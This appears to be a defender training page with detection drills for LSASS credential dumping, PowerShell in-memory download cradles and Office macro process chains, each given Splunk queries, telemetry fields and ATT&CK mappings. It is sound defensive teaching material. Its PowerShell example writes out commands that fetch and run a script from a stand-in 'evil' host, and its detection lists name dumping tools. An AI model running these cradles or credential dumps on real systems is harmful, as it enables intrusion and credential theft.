TRAINING DRILLS FOR DEFENDERS. EVERY ATTACK LEAVES TELEMETRY.
Each drill follows the defender's workflow: ATTACK → SYSTEM BEHAVIOR → TELEMETRY → DETECTION
Attack: Credential dumping — adversary targets LSASS process memory to extract passwords, hashes, and Kerberos tickets.
Tools: Mimikatz, Procdump, Comsvcs.dll, Task Manager (MiniDump)
System behavior: A non-standard process opens a handle to lsass.exe with PROCESS_VM_READ access. The process then calls ReadProcessMemory to dump credential material.
| Source | Event | Key Fields |
|---|---|---|
| Sysmon | Event ID 10 (Process Access) | SourceImage, TargetImage, GrantedAccess |
Detection (Splunk SPL):

```spl
index=sysmon EventCode=10
    TargetImage="*\\lsass.exe"
    GrantedAccess IN ("0x1010", "0x1410", "0x1438", "0x143a")
    NOT SourceImage IN (
        "C:\\Windows\\System32\\svchost.exe",
        "C:\\Windows\\System32\\lsass.exe",
        "C:\\Program Files\\*\\MsMpEng.exe"
    )
| stats count by SourceImage, GrantedAccess, Computer
```
False positives: AV/EDR products, Windows Defender, svchost, csrss. Baseline your environment first.
Tactic: Credential Access
Technique: T1003.001 — OS Credential Dumping: LSASS Memory
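The drill's LSASS detection logic, as an added Python example that is not part of this page: it applies the same SourceImage allowlist to constructed Sysmon Event ID 10 records and goes one step beyond the query by testing the PROCESS_VM_READ bit (0x0010) in GrantedAccess rather than the four literal masks, so an unusual mask such as 0x1fffff is also caught. All sample events, hostnames and paths are constructed.

```python
from collections import Counter
from fnmatch import fnmatchcase

# PROCESS_VM_READ (0x0010) is set in every mask the drill lists (0x1010, 0x1410,
# 0x1438, 0x143a); without it a process cannot ReadProcessMemory on lsass.exe.
PROCESS_VM_READ = 0x0010

# Mirrors the drill's NOT SourceImage IN (...) clause. Baseline before trusting it.
ALLOWED_SOURCES = (
    r"C:\Windows\System32\svchost.exe",
    r"C:\Windows\System32\lsass.exe",
    r"C:\Program Files\*\MsMpEng.exe",
)

def _glob(value: str, pattern: str) -> bool:
    # Case-insensitive wildcard match on image paths ('*' also spans backslashes).
    return fnmatchcase(value.lower(), pattern.lower())

def is_suspicious_lsass_access(event: dict) -> bool:
    """True when a non-allowlisted process opened lsass.exe with a GrantedAccess
    mask that includes PROCESS_VM_READ (bit test, not a literal-mask list)."""
    if event.get("EventID") != 10:
        return False
    if not _glob(event.get("TargetImage", ""), r"*\lsass.exe"):
        return False
    source = event.get("SourceImage", "")
    if any(_glob(source, allowed) for allowed in ALLOWED_SOURCES):
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)  # Sysmon logs the mask as hex text
    return bool(granted & PROCESS_VM_READ)

def stats_by_source(events: list) -> Counter:
    """Equivalent of the drill's `stats count by SourceImage, GrantedAccess, Computer`."""
    return Counter(
        (e["SourceImage"], e["GrantedAccess"], e["Computer"])
        for e in events if is_suspicious_lsass_access(e)
    )

# Constructed sample Sysmon Event ID 10 records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 10, "Computer": "WS01", "SourceImage": r"C:\Users\alice\Downloads\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "Computer": "WS01", "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "WS02", "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "Computer": "WS02", "SourceImage": r"C:\Windows\System32\wmiprvse.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]
```

Running `stats_by_source(SAMPLE_EVENTS)` flags the procdump64.exe and taskmgr.exe accesses; the allowlisted MsMpEng.exe handle and the 0x1000 (no PROCESS_VM_READ) handle are dropped.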
Attack: Adversary uses PowerShell to download and execute payloads directly in memory, avoiding disk writes.

```powershell
IEX (New-Object Net.WebClient).DownloadString('http://evil/payload.ps1')
IEX (iwr 'http://evil/payload.ps1').Content
powershell -enc [BASE64_ENCODED_COMMAND]
```
| Source | Event | Key Fields |
|---|---|---|
| Windows | 4688 (Process Creation) | CommandLine, ParentProcessName |
| PowerShell | 4104 (Script Block Logging) | ScriptBlockText |
| Sysmon | Event 1 (Process Creation) | CommandLine, ParentImage |
Detection (Splunk SPL; the OR group is parenthesized so it is scoped to 4688 events only):

```spl
index=windows EventCode=4688
    (
        (CommandLine="*IEX*" AND CommandLine="*DownloadString*")
        OR (CommandLine="*Invoke-Expression*" AND CommandLine="*WebClient*")
        OR CommandLine="*powershell*-enc*"
    )
| stats count by CommandLine, ParentProcessName, Computer
```
Tactic: Execution
Technique: T1059.001 — Command and Scripting: PowerShell
Attack: Macro-based malware creates unusual process trees. A Word document shouldn't spawn PowerShell or cmd.exe.
Suspicious parent → child chains:
- winword.exe → powershell.exe
- winword.exe → cmd.exe → powershell.exe
- excel.exe → mshta.exe
- outlook.exe → powershell.exe
- winword.exe → rundll32.exe
| Source | Event | Key Fields |
|---|---|---|
| Sysmon | Event 1 (Process Creation) | Image, ParentImage, CommandLine |
Detection (Splunk SPL):

```spl
index=sysmon EventCode=1
    ParentImage IN ("*\\WINWORD.EXE", "*\\EXCEL.EXE", "*\\OUTLOOK.EXE", "*\\POWERPNT.EXE")
    Image IN ("*\\powershell.exe", "*\\cmd.exe", "*\\mshta.exe", "*\\rundll32.exe", "*\\wscript.exe", "*\\cscript.exe")
| table _time Computer ParentImage Image CommandLine
```
Tactic: Initial Access / Execution
Technique: T1566.001 — Phishing: Spearphishing Attachment
T1204.002 — User Execution: Malicious File
Logs are frame data for attackers. Know your telemetry.
| Source | Event | What It Shows | Defends Against |
|---|---|---|---|
| Sysmon 1 | Process Creation | What ran, who spawned it, command line | LOLBins, malware execution |
| Sysmon 3 | Network Connection | Process making network calls | C2 beaconing, data exfil |
| Sysmon 10 | Process Access | Cross-process memory access | Credential dumping, injection |
| Sysmon 11 | File Create | New files written to disk | Payload drops, persistence |
| Sysmon 13 | Registry Value Set | Registry modifications | Persistence, config changes |
| Win 4688 | Process Creation | Process + command line (if enabled) | General execution monitoring |
| PS 4104 | Script Block | Deobfuscated PowerShell code | Obfuscated attacks, cradles |
ADVERSARY ARCADE — Detection Dojo
fungiknight © 2026